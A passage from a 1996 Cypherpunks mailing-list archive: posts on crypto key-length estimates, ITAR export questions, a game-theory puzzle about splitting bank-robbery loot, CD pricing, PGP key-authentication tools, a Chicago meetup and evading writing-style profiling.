homes, they are buying the bigger homes.   In order to do that, they have 
to take bigger loans.

Bigger loans mean that the cycle of debt continues.

So, yes salaries are 2x to 4x higher, but there is a problem in the amount 
of credit being given to young people.  There is something inherently wrong 
with the amount of our economy that deals with debt.   We can't continue to 
purchase things on margin, or on credit.   Another recession is going to 
come, and when it hits, it will hit HARD.  At least that's my opinion.

Brad

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfkGDq80j2q8tTgtAQHL4AP9EcyJ0YT9XQRz1ympFKeMX0Wo5JNOR4Z8
FA913PIRu4zkYi8/WQN4yNJh5jA5376PBVAXbW/upcNQZ+VbxXYh4T0QQPk51vPK
MCHqGoVsTJpKJ+Utx7/0Wi0B6Y/TZnYaDgj9dz0TpdkH1fmyJXGi4kH+R3Y1TDoq
f/i7gB5dzRQ=
=rnpj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 27 Jul 1996 06:40:03 +0800
To: perry@piermont.com
Subject: Re: IP: NSA RESPONSE TO KEY LENGTH REPORT
In-Reply-To: <199607261744.NAA23409@jekyll.piermont.com>
Message-ID: <199607261753.KAA12891@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry comments:

> Mike Duvos writes:
> > Matt Blaze <mab@research.att.com> writes:
> >  > Finally, the NSA report offers estimates of the time
> >  > required to perform exhaustive search using a Cray model T3D
> >  > supercomputer.  This is a curious choice, for as our report
> >  > notes, general-purpose supercomputers of this type make poor
> >  > (and uneconomical) key search engines.
> > 
> > A tiny nit to pick here.  The Cray T3D and T3E computers are
> > massively parallel machines consisting of DEC Alpha chips hooked
> > up in a 3D Torus configuration.  They would probably make pretty
> > decent key search engines,
> 
> Not compared to programmable logic devices, they wouldn't...
> 
> And that is, after all, the point...

My point was that the T3D is not a "general-purpose supercomputer."

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 07:46:59 +0800
To: "Clay Olbon II" <cypherpunks@toad.com>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607261757.KAA18208@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 7/26/96 -0400, Clay Olbon II wrote:
>jim bell <jimbell@pacifier.com> wrote:
>>My previous answer was incomplete, of course.  I continue to believe that 
>>the problem is unsolveable as stated, if for no other reason than the 
>>"weight" of the negative represented by dying is not stated.  It's a VERY 
>>complex problem, unless there's some trick I'm not seeing.
>
>Jim is right.  The problem with any optimization problem is when
>unquantifiable negatives are included.  The "classic" example of this is an
>inventory problem.  The optimal solution is minimal (or no) inventory,
>however there are unquantifiable negatives that arise when a customer
>cannot get his product when he wants it.  I don't think the problem is that
>complex if the negative is that you get no money rather than "you die".  As
>an aside, many game theory problems (possible including the simplified
>version of this one) are solvable using linear programming (and no, that is
>not writing C one line at a time ;-).  It has been far too long since my
>last game theory course to consider trying to set this problem up however
>(I've found that I don't use either game theory or LP a whole lot in the
>"real world" of engineering).  

Here is my best (currently!) guess at an APPROXIMATION of the solution.   In 
order to avoid the indeterminacy of the weight of a death versus money, I 
assume that a solution can be found on the first proposal.  (presumably, the 
first chooser is _motivated_ to find one, right?!?)  This means that the 1st 
chooser must select a distribution that will make at least 50% happy.

The first wild guess is that he's offer equal shares of the money to himself 
(#1) and the next nine (#2-#10).  But the problem with that is that the 
higher-numbered people might feel inclined to defect, possibly figuring that 
by getting rid of the people before them, they could increase the size of 
their likely reward.  Probably the solution is to offer those higher enough 
money so that they have no reason to defect.

The amount that should be offered to each could be related to the maximum 
amount that person might reasonably be able to expect, if all of the people 
ahead of him in line had been eliminated.  #1 and #2 can, at best, expect 
1/10th of the reward each, #3 and #4 can expect 1/9th, #5 and #6 can expect 
1/8th, #7 and #8 can expect 1/7, and finally #9 and #10 can expect 1/6.

Of course, all this adds up to more than 1 (actually, 1627/1260), so the 
result must be normalized to bring the total amount offered down to "1".  

BTW, as extra "inducement" the people at the beginning of the line (2, 3, 4, 
etc) can agree and publicly announce that if anyone between 2 and 10 defects 
from this arrangement, he will be passed over in subsequent iterations of 
this process, selecting people starting from #11 and above in their place.  
Thus, the people between #1 and #10 are strongly motivated to go along with 
this arrangement from the beginning, particularly those near #10.


Of course, this raises yet another possibility.  Suppose #1 made an proposal 
like this:

"The money is to be split equally among everybody who votes for this 
proposal."    The high numbers (11-20) are motivated to vote for this, for 
fear that in the absense of such an agreement the low numbers would agree to 
split the pot without them.  Likewise, the low numbers would be inclined to 
get an agreement rather than risk having their proposals rejected and them 
killed.    Anyone who defects risks losing out on everything.


(However, in order for proposals like this to be properly evaluated, it is 
necessary to establish certain issues, such as whether there's a secret 
ballot or not, etc.  Also, even if the results of the ballot are not secret, 
are the votes revealed all at one time, or are the participants polled 
individually, and in what order.  Can a participant adjust his vote 
according to the votes of another?)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 15:22:51 +0800
To: cypherpunks@toad.com
Subject: Re: CD Prices and Inflation
Message-ID: <ae1d6b7918021004cf96@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 AM 7/26/96, jim bell wrote:
>At 05:06 AM 7/26/96 -0700, Timothy C. May wrote:

>>So, while I "wish" CD prices were even lower, I'm paying a lot less in
>>"real dollars" for more music today than I was paying 15 years ago or 30
>>years ago.
>
>I think you're trying to hide a 5-year effect by immersing it in 30 years of
>change.  Yes, we've had inflation, but the large spurt of post-Vietnam
>inflation was basically over by about 1983, when the CD was introduced.   At

No, I'm not "trying" to hide anything. What I said is what I meant: CDs
today offer more music/dollar than LPs did in 1967. And, in 1975. And, in
1983.

(In 1983 I bought my last "audiophile" LP, a direct-to-disk
half-speed-mastered album that cost me something like $12.)

The complaint that CD prices have not fallen faster than some would like,
since 1983, is a different kettle of fish from what my point was, that CD
prices in 1983 or in 1996 are a better "deal" than LPs were in the period I
described.

As for prices not dropping, if customers stopped buying, prices would drop
very rapidly. That they are not, and that "mega-stores" are sprouting up
all over  place tells us that CD sales are exploding.

Finally, and most convincingly, nothing in U.S. law prevents Jim Bell or
anyone else from setting up his own CD company and undercutting the prices
of the Biggies.

Hey, if you think you can supply CDs to customers for a lot less money, go
for it!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sat, 27 Jul 1996 08:16:51 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <Pine.BSI.3.93.960726112716.5736H-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Allright, considering the 3rd goal, I think the first guy gets all the 
money and everyone lives.

Here's why:

in the case of 2, 19 takes it all and 20 gets nothing. So with 3,
since 20 will get nothing with 2 left, he may as well vote for 18 to get 
it all, since that increases the number who survive.

So with 4, 17 proposes that 17 get all the money, and since 19 and 20
are already resigned to getting nothing, they will go along with 17.

Following this to the end, the first guy gets all the money and everyone  
lives.

On Thu, 25 Jul 1996, Igor Chudov wrote:

> Igor Chudov wrote:
> > 
> > Here's a puzzle for our game theorists.
> > 
> > Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> > how they plan to split the money: they stay in line, and the first guy
> > suggests how to split the money. Then they vote on his suggestion. If
> > 50% or more vote for his proposal, his suggestion is adopted.
> > 
> > Otherwise they kill the  first robber and now it is the turn of guy #2
> > to make another splitting proposal. Same voting rules apply.
> > 
> > The question is, what will be the outcome? How will they split the
> > money, how many robbers will be dead, and so on?
> > 
> 
> I forgot to say what the GOALS are. The goals of every individual
> cypherpunk are (in from highest to lowest priority): 
> 
> 1. Stay alive
> 2. Get as much money as possible
> 3. Keep as many cypherpunks alive as possible, all other things being equal.
> 
> 	- Igor.
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfkOiC/fy+vkqMxNAQEo3wP/V+DuUGKc9YUBC/QzFtx/hX+arZwJqAU5
rXdvHF7DGnRbjiqRqFvZGy8DpoDhGD/UZkO71Ilf25iSW7Nkq/FUaYuyR3An/axi
YqUxw+Mq3b42FyNWXZRENqG1aGZDRMxy41mEIBzp8gljIqRBCQh+EUrvrFzs+xP0
UX+RQJ5N+Zs=
=u5PJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Fri, 26 Jul 1996 21:37:56 +0800
To: cypherpunks@toad.com
Subject: Am I protected by ignorance?
Message-ID: <9607260929.AA14439@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Jul 26 11:26:59 1996
I have a question about legal issues:

Lets asume I have a service provider in switzerland who gives me web-space.
I publish strong cryptography there. The server itself is physically in 
USA, but my domain is something like "www.itar.ch" (a swiss web-address). 
Since there is no way for me to know where the server stands, do I violate 
the ITAR, and if so, am I realistically prosecutable?


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfiPZBFhy5sz+bTpAQHbKggAi7kG/Bp8x+fApJTTSDw6AAcXe+U5TyVG
ladtDvnQOQE66raEqvfTWUPuyB5Fa9xqRAe/kpSkxU7802TPMnxMii3dJPLaOMv7
eYZx58VVVeSmbnC3qnN4SU5uSYnS7dNXE50kPaZDq0bap3O2LVB0yTL30xqBuF5+
EJs73dJQRKt/UipbymTLmeThDM1bRj0CxRL5b1OHHoYM5yDMhpxrS5KWnke7Pxqe
lTM3K+XTdpLC3MgmD15hpAfpn82uYGm8a21EsJ/ODLdxrdEv7mRm36V7EYH+JAqM
9jM3Hy38vnGHk6inB2dLGofa5tzFdbEhW2TtL6chRAnmemQkmVN8jg==
=eWJb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <jkenth@c2.org>
Date: Sat, 27 Jul 1996 06:17:23 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Anonymous Web Services Inc.
In-Reply-To: <199607261640.MAA03597@unix.asb.com>
Message-ID: <Pine.SUN.3.94.960726112523.12838c-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Deranged and cpunx,

I figure the digicrime site for provocateurs.
Ignore them and they'll go away, or what?

Kent (from pine)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jul 1996 07:41:09 +0800
To: cypherpunks@toad.com
Subject: RE: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <199607261837.LAA24288@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:09 AM 7/26/96 -0700, Timothy C. May wrote:
>... I hate the term "nerd," as I hate the
>names "dweeb," "geek," "jerk," etc. Believe me, anyone who thinks being
>called a "nerd" is complimentary, or anyone who labels himself as a "geek,"
>is probably one who would call himself a "nigger," or a "queer.")

I must disagree with Tim on this issue.  Back in the dark ages, before the
revolution, the Yankee was an insult used by British sympathisers to
describe the hick American revolutionaries.  The Americans adopted it as a
matter of pride and threw it back in their detractors face.  

Homosexuals are doing the same thing with the them "queer".  When I went to
Dan Farmer and Wietse Venema's class in Internet Security, Dan taught the
class wearing a tank-top which said "QUEER" across the front.

People with pride in themselves and what they do can make their detractors
eat their insults.  We should make it clear that "nerd," "dweeb," "geek,"
"jerk," etc. are where the money is.  We should turn them into terms of
pride in what we are and what we do.

Bill


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 27 Jul 1996 02:37:06 +0800
To: david@sternlight.com>
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <v03007804ae1e2226c5ed@[192.187.162.15]>
Message-ID: <olyCdry00YUw0E77M0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


David's comments bring more heat than light.

Freeh's statements were not distributed to senators before the hearing,
so they couldn't have read his prepared statement.

Further, he wandered considerably from his prepared statement at the
hearing. I wonder why David is talking about what Freeh addressed in his
statement, instead of what he actually said.

-Declan
 


Excerpts from internet.cypherpunks: 26-Jul-96 Re: Freeh Testimony
7/25/96 by David Sternlight@sternli 
> They cannot have read his prepared statement, which addresses this issue
> (see below). Neither, apparently did you, Dave, or you would not leave the
> misleading impression Freeh didn't address this topic. Were you being
> sloppy? Mendacious?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 26 Jul 1996 20:03:32 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <v03007805ae1e24c262c7@[192.187.162.15]>
Message-ID: <31F89692.167EB0E7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight wrote:
> 
> >>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> >>how they plan to split the money: they stay in line, and the first guy
> >>suggests how to split the money. Then they vote on his suggestion.
                                          ^^^^         ^^^
> No. Robber 18 knows that he will be killed under those circumstances, so he
> proposes that Robber 20 gets all the money. 20 votes with him. 

I think many are assuming that the cypherpunk making the suggestion
gets a vote.  My reading of the puzzle is that he does not.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 08:00:11 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Solution?
Message-ID: <199607261858.LAA21548@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 PM 7/25/96 -0500, Igor Chudov wrote:
 
>> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>> how they plan to split the money: they stay in line, and the first guy
>> suggests how to split the money. Then they vote on his suggestion. If
>> 50% or more vote for his proposal, his suggestion is adopted.
>> 
>> Otherwise they kill the  first robber and now it is the turn of guy #2
>> to make another splitting proposal. Same voting rules apply.
>> 
>> The question is, what will be the outcome? How will they split the
>> money, how many robbers will be dead, and so on?
>
>I forgot to say what the GOALS are. The goals of every individual
>cypherpunk are (in from highest to lowest priority): 
>
>1. Stay alive
>2. Get as much money as possible
>3. Keep as many cypherpunks alive as possible, all other things being equal.

Getting closer:

#1 says to the rest:  "We're going to have a sequential vote, #1 to #20.  
The first 10 who vote "yes" to this proposal get to share in the loot, 
equally."

#1 must vote in favor, obviously.  The second can "guarantee" himself a part 
of the pot, if it's given out in this first round, by voting "yes."  The 
#2 is only motivated to vote "no" if he thinks he can get a better deal 
on subsequent iterations, and it's conceivable there won't BE more 
iterations if at least 9 people after him vote "yes" and he's voted no.  
Also, if this first proposal is rejected, the #2 wouldn't be in an 
appreciably better position than #1 was.  So #2 will vote yes, as well.

This procedure will repeat.  As more people vote "yes," the danger in 
defecting (voting "no") will increase, because it will be effectively 
certain that  someone else will collect that reward.  As long as there are 
more people left to vote than would be necessary to increase the vote total 
to 10, nobody can afford to vote "no."

So the proposal will pass, and the first 10 intelligent people will win. 



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jul 1996 07:47:10 +0800
To: cypherpunks@toad.com
Subject: Re: AP on Crypto Hearing
Message-ID: <199607261857.LAA26180@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:28 PM 7/26/96 +0000, John Young wrote:
>   7-25-96. The Associated Press: 
> 
>   Computer Codes May Aid Crime   
> 
>... 
> 
>   But a top official at the National Security Agency -- whose 
>   job is to break secret codes -- said the encryption "genie 
>   is not out of the bottle." NSA Deputy Director William 
>   Crowell said encryption won't be widely used until it is 
>   marketed and sold, with support to help people use it. 

True, crypto won't be widely used until it is marketed and sold.  Only the
4 horsemen will have it.

Terrorists with their government supporters will have the support and
training.  So will high level drug dealers and money launderers (mostly the
same people).  Child pornographers will learn quickly.  Militias already
have the infrastructure to teach military techniques and some of them know
about comsec.  Soon all of them will.  Face it, the 5 horsemen won't have a
problem.

The 4 horsemen are a red herring.  The issue is domestic surveillance.

The bottom line of the issue is: Do we get end-to-end secure telephones
before or after the telecom industry/taxpayers have to make the investment
to provide law enforcement with access to 1% of all the calls in the
country?


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 27 Jul 1996 02:48:01 +0800
To: bryce@digicash.com
Subject: Re: NOT noise! Serious cypherpunkly work afoot
In-Reply-To: <199607261224.OAA05075@digicash.com>
Message-ID: <clyCmBW00YUw0E7Dg0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 26-Jul-96 NOT noise!  Serious
cypherp.. by bryce@digicash.com 
> Anybody have a Nextstep box with gcc and gnumake that I can borrow
> some CPU cycles from?

Sure, if you don't mind a 68040. Not on the Net (though I suppose I
could enable dialup) but I'd be happy to compile and run code for you.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 27 Jul 1996 07:06:42 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.LNX.3.93.960726114143.1310A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     As previously discussed, I am announcing a Greater Chicago Area 
CypherPunks Physical Meet. 

     The date is Saturday, 3 August 1996 at or around 4 p.m. at 
Ye Olde Saint Andrews Pub, 5938 N. Broadway, Chicago Il. Instructions are 
at the end of this post. 

     Things _I_ would like to discuss, of course, this is me, so it is very
amenable to changer:

     1) Setting up a Chicago Area Remailer, not simply running a single
remailer on a single account, but trying to go one better. 

     2) Discuss the possibility of a public event to spread the word about
cryptography/encryption. 

     3) Discuss the next meeting. 

The reasons for selecting St. Andrews Inn:

     1) It is relatively empty. 
     2) It has Food (Supposedly real good shepard's pie, made from real 
shepards(I asked)), Drink (Cider, and they know what snakebite is), and 
Non-alcoholic beverages. 
     3) It is easy (relatively) to get to. 


To get to St. Andrews Inn:

     By Car: Take Lake Shore Drive North until the LSD ends. 
             Go North on Sheridan (right turn off of LSD) to Thorndale 
                (About 5900 North) 
             Turn left on Thorndale (heading west) and drive to Broadway 
                (About 4 or 5 blocks) 
             Park. 
             St. Andrews is on the North West Corner of the intersection, 
                 under the green awning. 
      
     By El: Take the Red Line (Howard/Dan Ryan) to Thorndale 
            Go west 1/2 block from the El, This is Broadway
            St. Andrews is on the North West Corner of the intersection, 
                under the green awning. 

     I will try to have a map up at http://www.encodex.com/cypherpunks 
later today.
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 27 Jul 1996 06:59:41 +0800
To: cypherpunks@toad.com
Subject: Why the world needs privay protecting Ecash
Message-ID: <v02120d0dae1e98f1600b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


>>> S.KOREA PROBES 15,000 PEOPLE OVER CREDIT CARD USE - South Korean
>   state prosecutors are probing 15,000 people for excessive use of
>   their credit cards overseas in a crackdown on lavish spending, a
>   prosecution official said on Thursday. [Reuters, 200 words]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 27 Jul 1996 03:59:28 +0800
To: "J. Kent Hastings" <jkenth@c2.org>
Subject: Re: Anonymous Web Services Inc.
Message-ID: <199607261640.MAA03597@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Assuming your excerpt is accurate, it's either a bad joke, a scam on 
dumb users (possibly by equally dumb operators) or a sting.

My $.02 worth.  (Hey, imagine a day when eca$h for two cents is posted
with a comment like that?)

Rob

On 26 Jul 96 at 0:17, J. Kent Hastings wrote:

> Cpunx, ecashers, and others:
> 
> Oh joy, these guys are good publicity for our side. :^(
> Arghh!!!
> 
> http://www.angelfire.com/pg1/digicrime/index.html
> >                       Anonymous Web Services Inc.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jul 1996 07:45:49 +0800
To: cypherpunks@toad.com
Subject: CandleWeb V1.1 - Web client, "secure E interpreter"
Message-ID: <Pine.GUL.3.95.960726130141.11417D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I doubt this is going to become a mass-market phenomenon, but some people
seemed to be interested in E.

- ---------- Forwarded message ----------
Date: Fri, 26 Jul 1996 12:06:01 +0200
From: Gunnar R|nning <gunnar@candleweb.no>
To: win-request@metrics.com
Subject: CandleWeb V1.1 - Web client with interactive animation support

CandleWeb AS is pleased to announce version 1.1 of the CandleWeb client.
The client is freely available for Windows 95 and X11. Precompiled versions
exist for Windows 95, Linux, Sunos 4 and Irix. 

CandleWeb is a powerful and easy way to create interactive animations and
applications for use on the Web. The CandleWeb client is an interpreter
for the language E(pronounced like "awe" in english). CandleWeb features
include :

- - Vector graphics objects to reduce bandwidth requirements and simplify
  animation development. 

- - Bitmap graphics(GIF and JPEG).

- - Sound (MIDI and WAV).

- - User-interaction objects.

- - Web-protocols support. http(GET/POST), ftp, and file URLs are
  supported. Access to file URLs is by default prohibited due to security
  considerations.

- - Portability and architecture independence.

- - Security, interpreted programs is executed in a safe environment. 

The client has builtin damage-repair and double-buffering to achieve high
performance graphics. Animations are easier to create in E than in
traditional languages, due to the declarative nature of the E
graphicssystem.  

AweThor is an authoring tool for CandleWeb that simplifies the task of
creating animations and graphics in E. AweThor is available as shareware
for $100(US).

Download the client from :

<URL:ftp://thor.candleweb.no/pub/dist/>

Find more information on :

<URL:http://www.candleweb.no/>


New features in this release of CandleWeb :

- - Composite objects. The language now has support for user-defined
  composite objects. 

- - Support for dynamic loading of libraries and automatic revision control
  to store library copies locally.

- - A new parser written in PCCTS has allowed us to clean up the language,
  and bring it somewhat closer to the C programming language in syntax. 

- - Global variables. 

- - Local function declarations.

- - Regular expressions, through the new function regmatch.

- - Support for MIDI and WAV on Win95 and Unix platforms using the Unix
  Sound Standard(USS). Linux has support for USS. Can play single or
  continuous sounds asynchronously.

- - Better color support for X11 :
  1. 24-bits support.
  2. On PseudoColor it does not install a private colormap by default
     anymore.
  3. Use the -perfect option to install a private colormap.
  4. When -perfect is specified it uses a dithering technique to achieve
     2048 virtual colors.

- - HTTP post is now supported through the function post().

- - Other new builtin functions : optimizeObjects, contentType, substr,
  getWindowSize, read, write, and link.

- - New functionality in the translation attribute : Motion(for motion of the
  mousecursor), ResizeWindow, Transparent (to send matching events onwards
  to the next inputarea). 

This release also include number of bug-fixes , and some speed
optimizations to the interpreter.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfkkwZNcNyVVy0jxAQGhHQIAwYjS30G7yTqKFrk9L3EP5hX3K2+y2LAK
gYOwTVqtN5v+94kBhKqfNogwNM2j/ku5crAWr10jpskuTUFKpF0sLw==
=SrQb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 27 Jul 1996 07:06:53 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating "Perp Profile" Analyses Of Written Materials
In-Reply-To: <01I7GBFL287694F9CD@delphi.com>
Message-ID: <v03007805ae1ed6b7c9a0@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM -0700 7/25/96, JonWienk@ix.netcom.com wrote:
>On Wed, 24 Jul 1996, JMKELSEY@delphi.com wrote:
>>I wouldn't count on even heavily-chained anonymous remailer messages
>>to protect my identity from moderately wealthy and determined
>>attackers, if I did many anonymous posts.  Writing style and topic
>>alone may narrow the suspect list down to a manageable number.
>
>There is an easy way to defeat psycholinguistic analysis techniques used by
>LEA's to profile perps.  Buy a translation program, (such as Globalink's
>Spanish
>Assistant) use the program to translate the text to Spanish, (or any other
>language) and then use the program to translate the foreign language text
>back
>to English.  The baselines of word choice, grammatical structure, etc.
>will be
>shifted to reflect the biases of the program rather than the biases of the
>writer.  As an example, I will use the entire text of this message as a
>demonstration.

You are using two code books for double encoding. This is the kind of
problem analysts solve while brushing their teeth. All the analyst has to
do is determine your translation programs (easy to do since they have such
obvious anomalies) and create reverse code books. The malapropisms are so
obvious that there should be little difficulty aggregating the longest
phrases that make up one codebook entry.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Reiter <reiter@research.att.com>
Date: Sat, 27 Jul 1996 06:43:47 +0800
To: cypherpunks@toad.com
Subject: new service for PGP
Message-ID: <199607261724.NAA16316@cloak.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



To all PGP users:

We would like to make you aware of a new tool, called PathServer, for
use with the "Pretty Good Privacy" (PGP) key management and encryption
software. PathServer is a tool to help users to determine to whom a 
public key belongs, i.e., to "authenticate" the key. PathServer 
returns an active graphical representation of disjoint paths from a 
trusted key to the query key. PathServer helps support user 
authentication policies requiring that no single introducer is relied 
upon multiple times for information regariding a key. 

 PathServer can be accessed at
	http://akpublic.research.att.com/~reiter/PathServer

We welcome and appreciate any comments or suggestions.  Send any
comments to reiter@research.att.com or stubblebine@research.att.com.

PathServer is an experimental service that is still under development,
and thus it will likely be unreliable and slow for a while.  Thanks in
advance for your patience.

Mike Reiter
Stuart Stubblebine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Davis <ericd@cyberfarm.com>
Date: Sat, 27 Jul 1996 08:06:31 +0800
To: cypherpunks@toad.com
Subject: U.S. Territories?
Message-ID: <Pine.LNX.3.91.960726130933.9066A-100000@lanshark.cyberfarm.com>
MIME-Version: 1.0
Content-Type: text/plain



Are U.S. territories (Guam, Virg-Isl, etc) included in U.S. export 
restrictions for items such as strong crypto, etc..

Thanks
Eric Davis

-----------------------------------------------------
Eric Davis                        ericd@cyberfarm.com
Co-Founder MediaCast:       http://www.mediacast.com/
Personal contact:  ericd@cyberfarm.com  [KD6HTO (RF)]
-----------------------------------------------------
- "If women of the world had not been excluded from
- world affairs things today might have been
- different." Said Alice Paul, Founder of the World
- Women's Party for Equal Rights in 1938.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jul 1996 14:48:01 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Twenty Bank Robbers -- Game theory:) [Classic Answer]
Message-ID: <v03007803ae1eb746c1b4@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 -0500 7/25/96, Igor Chudov wrote:


>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
